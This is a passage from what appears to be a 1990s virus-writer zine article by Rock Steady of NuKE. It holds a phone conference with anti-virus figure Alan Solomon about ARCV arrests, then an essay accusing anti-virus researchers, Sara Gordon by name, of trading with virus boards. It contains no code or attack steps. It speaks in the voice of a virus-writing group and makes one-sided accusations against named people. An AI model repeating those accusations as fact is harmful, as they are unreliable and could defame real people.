I'm just interested in where they go, and what disturbs me is all the people running around out there, claiming this `Big Threat'. You even stated in your articles that many in my collection were viruses, but there was an awful lot of junk.
SO> Yes, that's right.
AR> True, no problem with that. But that's representative of what's going around the country! See, this is what is represented on what's out there. And it's not that big a threat!
SO> It's not that big of a threat, for what?
AR> ARCV is being busted and charged for some viruses they didn't write Alan!
SO> Which viruses?
RS> All of them!
AR> Well they didn't write the McWhale, or the KoolMac...
SO> Why do you say they're being busted for those viruses?
AR> Because it's listed in an article, by someone up there in Scotland Yard, saying if anybody got infected by any of these viruses, to contact them!
SO> I don't know where Scotland Yard got the idea they wrote McWhale, I could have told them that!
AR> All of them are MPC viruses, nothing more.
SO> Well wait a minute, it depends on whom you believe is a member of ARCV!
AR> Do they think I'm a member of ARCV?
SO> Well Apache Warrior has been telling them that you are!
AR> Hah, I'm in the United States, and you're telling me I'm a member of ARCV!
RS> ARCV is SOLELY England
SO> Well that's what he has been telling them! Ask Apache Warrior.
AR> Well I didn't know this.
SO> Yes you did!
AR> That I've been a member of ARCV?
SO> You knew he's been saying that!
RS> Since when, do you want to clarify this.
SO> Since when what?
RS> You say John knows, what makes you so sure?
SO> Because the last time I spoke to John 2-3 months ago..
AR> I know we talked about him, and I know he narced all his friends! But I don't think you told me that he said I was a member of ARCV!
RS> Alan do you have a copy of the ARCV news-journal? Their first news journal and only news journal, all members are listed inside there, and Aristotle is not listed inside there.
SO> Do you have a copy of the second journal?
RS> The second journal was never released.
SO> ah, John's got a copy.
AR> Of the Second Journal?
RS> The second journal does not exist.
SO> John's got a copy.
AR> Tell me which one it's in now, and I'll look it up! Is it in the collection I sent you?
SO> Yeah.
AR> Does it have me listed in that?
SO> No, it doesn't.
AR> This is why I keep hearing feedback of people wanting to extradite me to England.
SO> Possibly, I can well imagine.
AR> Based on what a 19 year old phreaker has said. And also now, with my name going around being `Back in Business'...
SO> Well I don't know what he's basing that claim with, if he's got any files, or anything. I don't know. What I do know is that six months ago, he was facing fairly big trouble.
AR> And because he's been talking... well you know...
SO> He was facing big trouble, because he got caught stealing large amounts of telephone time from his next door neighbour. In an extraordinarily stupid manner, by the way.
AR> Yeah I know, he just went backdoor and plugged a phone line into it...
SO> There's no way he could have gotten away with that.
AR> Humm, interesting. So how can I get Scotland Yard to call me?
SO> You can call them, I'll give you the phone number.
AR> Naa, wouldn't do any good. So like once this trial starts, they may bring me over?
SO> I don't know, you can send them a letter. The person in charge of the case in Scotland Yard is Inspector John Hoston.
AR> humm okay.
SO> I can understand why you're pissed off. But Joe, what's your development in this? Why are you part of the phone call?
RS> Why not?
SO> There's no reason why not.
AR> I'll tell you why, cuz I asked him, as I'm putting an article in NuKE Info six. It basically explains my side, on how everything transpired.
SO> Did Nowhere Man really write the NuKE Encryption Device, by himself!
RS> Yes he did, why?
SO> Well because I saw it.
RS> Well that was just a Beta Release v.90.
SO> No, I've seen the final!
RS> uh?
What version do you have?
SO> oh sorry, we're not supposed to?
RS> version .90.
SO> No it's version 1.00
RS> That does not exist!
SO> I've got a thing that calls itself the N.E.D. v1.00, it might be of course.
RS> I'll tell you right now, it's version .90
SO> Is there some bytes I can read out to help to identify it?
RS> Not really, because version 1.00 changed dramatically.

For the most part this was the main concern of the conversation we wanted to bring out. Surely, this is only 1/5 of the total conference; as a matter of fact this was the first hour of the conference, and by tone of voice it was fairly hostile. But we are not ones to racially judge a person because of his ethnic surroundings, or occupation in life, so it would only be fair to say that Alan Solomon was a fairly reasonable man to talk to. Interestingly enough, Alan did remove his safeguard, so who said Solomon's package was unbeatable? The rest of the conversation did focus on ideas, ideologies, morals and some of the unexpected problems due to this structured AntiVirus bludgeon.

Problems you say? Who would have expected such a problem? The community responsible to `Clean-Up' the virus problem has done a good job in that, but who would have expected them to leave behind a muddy trail of destruction where they go? It all begins with the first Anti-Virus package, determined to detect and wipe out any known virus out there. Note the word `KNOWN'. So basically, you would have to collect, if you may say so, and perhaps have people collecting for you, viruses so that you may add them to your Anti-Virus package to gain the cutting edge over your competitors.

Now then, the remaining successful virus packages have somewhat localized, in a geographic sense. McAfee Scan has dominated North America, Vet7 has dominated the Australian and Asian region. You can conclude that Frisk has gained a fair amount of support in Europe, as well as Solomon's package. Now then, this is only because of geographic location.
If someone in California notices a new virus, the first person he'll call and give this virus to is, naturally, McAfee. The same goes for Solomon and people crying in England (UK). Now, to gain that cutting edge, wouldn't you need all of those viruses from across the world, so you may even begin to gain world-wide market share? Naturally, so what do you do? You can form alliances with other Anti-Virus programmers, but that isn't enough, and perhaps unfair! Unfair in the sense that an alliance between Solomon and McAfee would be to Solomon's advantage; surely McAfee covers a wider population and receives new viruses at a much faster pace compared to the England counterpart. So we're stuck between a rock and a hard place, again. Hey, , why not form an association with members pertaining to all these continents, and bring our collections together to form an Even Bigger collection? Sure! Great idea! Let's call it NCSA! Yeah! Then another newfy pops up and screams, CARO! Yeah, another group. But what happens now?

To our amazement, we have gentlemen roaming the underground technodrome, mission: collect new viruses. Having no statute they will resort to anything in order to gain new viruses. Somehow, our "heroes" that claim to save us from the virus problem are low-down, bottom of the food chain infantile, resorting to immoral methods to gain viruses. huh? Explain? humm, I will use myself as an easy example. I, Rock Steady, along with Pure Energy, manage a bulletin board known as Cybernetic Violence. The main headquarters of NuKE, we're looked upon as `evil-doers', misdirected youths, bullies that now know how to type, scum, satan's helpers... I believe you get the picture? And yes, it isn't a pretty one for sure, you may call this harassment, as a matter of fact it _is_ harassment. Now then, where can you get the latest virus put out by the intellectually challenged mind? Of course, the mischievous virus groups.
Oh no, this guy won't give me virus access unless I show him I'm `deserving' of it. Okay I got it, let me upload you my whole NCSA virus collection... Get the picture? Yes, we all heard it before, I'm a deranged liar. The Anti-Virus community is _not_ maniacal to associate themselves with us. We all heard of Sara Gordon screaming out, `I never called an underground exchange board'; she will never admit it. Nevertheless Sara Gordon holds the phone number of Cybernetic Violence, Black Axes, The Hell Pit, etc, etc. Sara doesn't associate herself with low-lives like ourselves, as she explains. Nevertheless, she has CLAIMED to have called up The Hell Pit BBS, and uploaded 3 fake viruses, and exclaims how easy it was to obtain virus access there. Now there's a contradiction. Now who are you going to believe? Rock Steady, with a record for hacking, and suspected of other cyber-crimes, or Sara Gordon with not even a bug-stain on her record?

Wait, let me tell you some more. Sara Gordon is not totally `white'; since Sara doesn't associate herself with `us', I guess the conversation we had concerning her wanting to invite a person called `Nowhere Man' to dinner was a figment of my imagination. Also, the crap she said to me about getting her in contact with virus writers in Australia was a figment of my vivid imagination. Come on Sara, I heard it and you said it. Of course, this is simply my word against yours. Son of a gun Sara, didn't you hear all them `clicking' noises during our conversation? There was someone else on the line Sara! Someone that kept on receiving calls, and therefore he/she had to switch and answer the call, via Ma Bell's `Call Waiting' service. See, I guess this isn't after all just a figment of my imagination. Since I conferenced the call, my phone bill supports the fact that TWO calls were made at the same time from my number! One was to the alleged person in the background while the other was yours!
(Sara) Oh yes, I'm a bored teenager, deranged liar wanting to bust balls. Frankly, no one admitted in NuKE is a teenager. Frankly I'm currently in a respectable banking position; nevertheless I still am pursuing my Masters in Mathematics, and this may even lead to a Ph.D. Of course by then I'm expected to sprout out of my satanic puberty stage and into adulthood. Even though I'm way past the legal adult age, may you still say it's a hormone thing. Frankly, when justice is not done and lies are tossed over to the public, discrediting our history, with your influence of power... Until that day of justice, until that day the truth comes out, that will be the day you will get rid of me. You see this isn't about me, this is about you. This isn't something you `mature out of'; when do you mature out of injustice? At what point in life is injustice okay? The Virus problem has been solved, now what about the Anti-Virus Problem?

Rock Steady
NuKE: The Anti-Anti-Virus Group!

================================================================================